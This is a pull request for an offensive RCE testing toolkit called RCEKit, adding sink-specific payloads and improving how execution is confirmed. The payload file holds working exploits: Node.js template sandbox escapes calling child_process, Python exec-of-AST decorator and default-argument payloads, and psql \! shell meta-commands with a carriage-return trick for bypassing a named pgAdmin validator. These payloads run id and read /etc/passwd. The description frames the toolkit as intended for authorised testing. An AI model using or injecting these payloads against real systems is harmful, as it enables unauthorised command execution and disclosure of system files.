### PR TITLE
Add sink-shaped payloads and encoding-aware confirmation

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — RCE Testing Toolkit
 
-**Version 2.7.0** · MIT · Python 3.8+ · no third-party dependencies
+**Version 2.8.0** · MIT · Python 3.8+ · no third-party dependencies
 
 RCEKit is an offensive **RCE testing toolkit** for authorised penetration
 testing, red teaming, and security research. It covers the full loop, not just
@@ -171,8 +171,9 @@ Non-runnable transforms (ROT13, XOR/chunk shuffling, byte splicing) were removed
 <details>
 <summary><b>Code-execution sinks</b> (for <code>--categories code_execution</code>)</summary>
 
-- **nodejs** — `child_process_exec`, `pug_ssti`, `ejs_ssti`, `handlebars_ssti`, `vm_eval`, `deserialization`
-- **python** — `os_system`, `subprocess`, `jinja2_ssti`
+- **nodejs** — `child_process_exec`, `pug_ssti`, `ejs_ssti`, `handlebars_ssti`, `vm_eval`, `deserialization`, `expression_template` (server-side `{{ }}` expression sandbox escape, e.g. n8n)
+- **python** — `os_system`, `subprocess`, `jinja2_ssti`, `exec_ast` (function-definition / decorator / default-arg execution in `exec`-of-AST validators, e.g. Langflow)
+- **postgres** — `psql_meta_command` (`\!` shell meta-command, including the CR (`\r`) validator bypass, e.g. pgAdmin restore)
 - **php** — `exec_system`, `eval`, `deserialize`
 - **java** — `runtime_exec`, `freemarker_ssti`, `velocity_ssti`, `thymeleaf_ssti`, `spel`, `ognl`, `groovy`, `deserialization`, `expression`
 - **dotnet** — `process_start`, `deserialize`

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.7.0"
+__version__ = "2.8.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -812,6 +812,7 @@ class RCEKit:
                 working = payload
                 token: Optional[str] = None
                 oob_host: Optional[str] = None
+                math_match: Optional[str] = None
                 exp_channel = expected_channel
                 ind = indicator
                 if "{oob}" in working and oob_domain:
@@ -823,6 +824,16 @@ class RCEKit:
                 elif "{canary}" in working:
                     token = self._generate_canary()
                     working = working.replace("{canary}", token)
+                elif "{math}" in working:
+                    # Randomized arithmetic canary for template/expression sinks.
+                    # A fixed 7*7=49 collides with any '49' already in the page
+                    # (dates, counters, ids) and is reported inconclusive; a random
+                    # 4-digit product is effectively unique, so its appearance is
+                    # proof the engine evaluated the expression, not a coincidence.
+                    a = random.randint(1000, 9999)
+                    b = random.randint(1000, 9999)
+                    working = working.replace("{math}", f"{a}*{b}")
+                    math_match = rf"(^|\D){a * b}(\D|$)"
 
                 # Decide separator-validity on the canonical payload, before any
                 # encoding hides (or spuriously reveals) the leading separator.
@@ -855,6 +866,8 @@ class RCEKit:
                 # matches the response regardless of how the payload was encoded.
                 if exp_channel in {"interactsh", "timing"}:
                     match = None
+                elif math_match is not None:
+                    match = math_match
                 elif token is not None:
                     match = re.escape(token)
                 else:
@@ -1428,8 +1441,8 @@ class RCEKit:
         if status is None:
             return "error", body[:80]
         if record.match:
-            if re.search(record.match, body):
-                if control_body and re.search(record.match, control_body):
+            if self._encoded_search(record.match, body):
+                if control_body and self._encoded_search(record.match, control_body):
                     if record.token:
                         return "inconclusive", ("canary reflected by the target in an inert control "
                                                 "(no execution needed), so the match is not proof")
@@ -1437,6 +1450,42 @@ class RCEKit:
                 return "confirmed", f"matched /{record.match}/"
             return "no-match", ""
         return "no-signature", "no machine-readable oracle for this payload"
+
+    def _encoded_search(self, pattern: str, body: str) -> bool:
+        """Match ``pattern`` against the response body AND against it after peeling
+        common output wrappers. A sink that base64/hex-encodes, URL-encodes,
+        HTML-escapes, or JSON/unicode-escapes the command output would otherwise
+        hide a genuine hit (e.g. ``dWlkPTA=`` instead of ``uid=0``). Every decode
+        is best-effort and additive: the raw body is always checked first, so this
+        only ever turns a missed confirmation into a hit, never the reverse."""
+        import base64, binascii, html as _html, urllib.parse, codecs
+        if re.search(pattern, body):
+            return True
+        candidates: List[str] = []
+        try:
+            candidates.append(urllib.parse.unquote(body))
+        except Exception:
+            pass
+        try:
+            candidates.append(_html.unescape(body))
+        except Exception:
+            pass
+        try:
+            candidates.append(codecs.decode(body, "unicode_escape"))
+        except Exception:
+            pass
+        for token in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", body):
+            try:
+                decoded = base64.b64decode(token + "=" * (-len(token) % 4)).decode("utf-8", "replace")
+                candidates.append(decoded)
+            except (binascii.Error, ValueError):
+                continue
+        for token in re.findall(r"(?:[0-9a-fA-F]{2}){8,}", body):
+            try:
+                candidates.append(bytes.fromhex(token).decode("utf-8", "replace"))
+            except ValueError:
+                continue
+        return any(re.search(pattern, c) for c in candidates)
 
     def run_verification(self, records: Iterator[PayloadRecord], url: str, method: str = "GET",
                          data: Optional[str] = None, headers: Optional[List[str]] = None,

--- a/templates/payloads.json
+++ b/templates/payloads.json
@@ -93,6 +93,7 @@
                 ],
                 "handlebars_ssti": [
                     "{{7 * 7}}",
+                    "{{ {math} }}",
                     "{{lookup (lookup (lookup (lookup __proto__ 'constructor') 'constructor') 'call') 'whoami'}}",
                     "{{#with (lookup (lookup this '__proto__') 'constructor')}}{{#with (lookup this 'constructor')}}{{call this 'cat /etc/passwd'}}{{/with}}{{/with}}"
                 ],
@@ -104,6 +105,12 @@
                 "deserialization": [
                     "const serialize = require('node-serialize'); const payload = \"{\\\"rce\\\": \\\"_$$ND_FUNC$$_function(){require('child_process').exec('id');}()\\\"}\"; serialize.unserialize(payload);",
                     "const payload = \"{\\\"rce\\\":\\\"_$$ND_FUNC$$_function(){process.mainModule.require('child_process').exec('id');}()\\\"}\"; require('node-serialize').unserialize(payload);"
+                ],
+                "expression_template": [
+                    "{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
+                    "={{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}",
+                    "{{ (function(){ return this.constructor.constructor('return process')().mainModule.require('child_process').execSync('cat /etc/passwd').toString() })() }}",
+                    "={{ $jmespath ? '' : (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}"
                 ]
             },
             "python": {
@@ -121,11 +128,28 @@
                 ],
                 "jinja2_ssti": [
                     "{{7*7}}",
+                    "{{ {math} }}",
                     "{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
                     "{{''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip()}}",
                     "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}",
                     "{{cycler.__init__.__globals__['os'].popen('whoami').read()}}",
                     "{{''.__class__.__mro__[2].__subclasses__()[40]('/bin/sh',shell=True,stdout=-1).communicate()}}"
+                ],
+                "exec_ast": [
+                    "@exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")\ndef _(): pass",
+                    "@exec(\"raise Exception(open('/etc/passwd').read())\")\ndef _(): pass",
+                    "def _(a=exec(\"raise Exception(__import__('subprocess').check_output(['id']))\")): pass",
+                    "def _(a=exec(\"raise Exception(open('/etc/passwd').read())\")): pass",
+                    "def _(a=__import__('os').system('id')): pass"
+                ]
+            },
+            "postgres": {
+                "psql_meta_command": [
+                    "SELECT 1;\n\\! id\n",
+                    "SELECT 1;\n\\! cat /etc/passwd\n",
+                    {"payload": "SELECT 1;\r\\! id\r", "notes": ["CR (\\r) separates the meta-command so a newline-based validator (e.g. pgAdmin CVE-2025-13780) does not detect the \\! line"]},
+                    {"payload": "SELECT 1;\r\\! cat /etc/passwd\r", "notes": ["CR (\\r) meta-command bypass; psql still executes \\! after splitting on CR"]},
+                    {"payload": "SELECT 1;\r\\! bash -c 'id > /tmp/rcekit_{canary}'\r", "expected_channel": "response", "notes": ["blind sink: confirm out-of-band or via the written marker rather than the HTTP response"]}
                 ]
             },
             "php": {

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -10,6 +10,7 @@ detection mode must behave as documented.
 
 import json
 import os
+import re
 import subprocess
 import sys
 import tempfile
@@ -1268,6 +1269,95 @@ class DoctorTestCase(unittest.TestCase):
             self.assertEqual(res.returncode, 1)
             self.assertIn("Refusing to run", res.stdout)
             self.assertFalse(out.exists())
+
+
+class NewSinkCoverageTestCase(unittest.TestCase):
+    """Sinks added from the real-world Vulhub evaluation. Each new payload must
+    carry the right machine-readable oracle so verification can confirm it."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+
+    def test_exec_ast_python_sink_confirms_via_command_oracle(self):
+        # Langflow-class sink: exec() of AST function-defs runs decorators and
+        # default-arg expressions. Payloads are function definitions; the existing
+        # command oracles must still attach.
+        records = list(self.gen.generate_payload_records(
+            selected_categories=["code_execution"], selected_environments=["python"],
+            selected_contexts=["raw"], selected_encodings=["none"],
+        ))
+        exec_ast = [r for r in records if r.sink == "exec_ast"]
+        self.assertTrue(exec_ast, "exec_ast sink must emit payloads")
+        self.assertTrue(all(("def " in r.payload or "@" in r.payload) for r in exec_ast))
+        self.assertTrue(any(r.match == r"uid=\d+" for r in exec_ast))
+        self.assertTrue(any(r.match and "root:" in r.match for r in exec_ast))
+
+    def test_expression_template_nodejs_sink_present_with_oracle(self):
+        # n8n-class sink: server-side {{ }} expression evaluation with a sandbox
+        # escape reaching child_process.
+        records = list(self.gen.generate_payload_records(
+            selected_categories=["code_execution"], selected_environments=["nodejs"],
+            selected_contexts=["raw"], selected_encodings=["none"],
+        ))
+        expr = [r for r in records if r.sink == "expression_template"]
+        self.assertTrue(expr, "expression_template sink must emit payloads")
+        self.assertTrue(any("this.process" in r.payload for r in expr))
+        self.assertTrue(any(r.match == r"uid=\d+" for r in expr))
+
+    def test_psql_meta_command_sink_carries_cr_bypass_and_oracle(self):
+        # pgAdmin-class sink: psql \! meta-command with a CR (\r) validator bypass.
+        records = list(self.gen.generate_payload_records(
+            selected_categories=["code_execution"], selected_environments=["postgres"],
+            selected_contexts=["raw"], selected_encodings=["none"],
+        ))
+        psql = [r for r in records if r.sink == "psql_meta_command"]
+        self.assertTrue(psql, "psql_meta_command sink must emit payloads")
+        self.assertTrue(any("\r" in r.payload and "\\!" in r.payload for r in psql),
+                        "a CR-separated \\! bypass variant must be present")
+        self.assertTrue(any(r.match == r"uid=\d+" for r in psql))
+
+    def test_math_canary_is_a_unique_product_not_49(self):
+        # The fixed 7*7=49 signature collides with any '49' on the page; the {math}
+        # canary must expand to a random product with a matching unique oracle.
+        seen_products = set()
+        for _ in range(5):
+            gen = RCEKit()
+            records = list(gen.generate_payload_records(
+                selected_categories=["code_execution"], selected_environments=["python"],
+                selected_contexts=["raw"], selected_encodings=["none"],
+            ))
+            # The canary is a multi-digit product ({{ 1234*5678 }}); match it
+            # precisely so it is never confused with the fixed {{7*7}} probe.
+            math = [r for r in records
+                    if re.fullmatch(r"\{\{\s*\d{3,}\*\d{3,}\s*\}\}", r.payload.strip())]
+            self.assertTrue(math, "a {math} canary payload must be emitted")
+            for r in math:
+                m = re.search(r"(\d+)\*(\d+)", r.payload)
+                product = int(m.group(1)) * int(m.group(2))
+                self.assertRegex(str(product), r.match)
+                self.assertNotEqual(product, 49)
+                seen_products.add(product)
+        self.assertGreater(len(seen_products), 1, "products must be randomized per run")
+
+
+class EncodedOracleTestCase(unittest.TestCase):
+    """O5: the confirmation oracle must see through common output wrappers so a
+    sink that base64/hex/url/unicode-encodes command output is still confirmed."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+
+    def test_matches_output_through_common_wrappers(self):
+        import base64
+        out = "uid=0(root) gid=0(root)"
+        pat = r"uid=\d+"
+        self.assertTrue(self.gen._encoded_search(pat, out))
+        self.assertTrue(self.gen._encoded_search(pat, "b64:" + base64.b64encode(out.encode()).decode()))
+        self.assertTrue(self.gen._encoded_search(pat, "hex=" + out.encode().hex()))
+        self.assertTrue(self.gen._encoded_search(pat, "q=uid%3D0%28root%29"))
+
+    def test_no_false_positive_on_benign_body(self):
+        self.assertFalse(self.gen._encoded_search(r"uid=\d+", "welcome — 49 documents processed"))
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
## Summary

Broadens real-world RCE detection based on a hands-on evaluation against live vulnerable targets. Each addition was validated end-to-end (delivery + confirmation) before landing.

## Changes

**New sink-shaped payloads** (they carry the existing command oracles, so confirmation needs no oracle changes):

- **python `exec_ast`** — function-definition / decorator / default-argument payloads for `exec`-of-AST code validators (the class where decorators and default args run at definition time). Bare expressions never execute in such sinks, so the previous `os_system`/`subprocess` payloads could not confirm them.
- **nodejs `expression_template`** — server-side `{{ }}` expression sandbox-escape payloads reaching `child_process`.
- **postgres `psql_meta_command`** — `\!` shell meta-command execution, including the CR (`\r`) separator that bypasses newline-based meta-command validators, plus a canary-marker variant.

**Oracle improvements:**

- **Randomized arithmetic canary (`{math}`)** — replaces the collision-prone `7*7=49` template signature with a random per-payload product (e.g. `8062*4537 → 36577294`), so a template-evaluation hit is unique instead of being downgraded to `inconclusive` by a stray `49` on the page.
- **Encoding-aware matching (`_encoded_search`)** — the confirmation oracle now also matches after peeling common output wrappers (base64 / hex / URL / HTML / unicode-escape), so a sink that encodes command output no longer hides a genuine hit. Additive only: the raw body is always checked first.

## Tests

- New coverage: exec_ast / expression_template / psql_meta_command sinks emit payloads with the correct oracle; the `{math}` canary is a unique randomized product; `_encoded_search` matches wrapped output with no false positive on a benign body.
- Full suite: **88/88 green**, offline, no third-party dependencies.

## Versioning

Bumped `2.7.0` → `2.8.0` (new features, backward-compatible) and updated the README (new sinks, version badge).

## Note

The session-aware multi-step verification (`--verify-chain`) is submitted separately in a follow-up PR that builds on this branch, so the two can be reviewed independently.
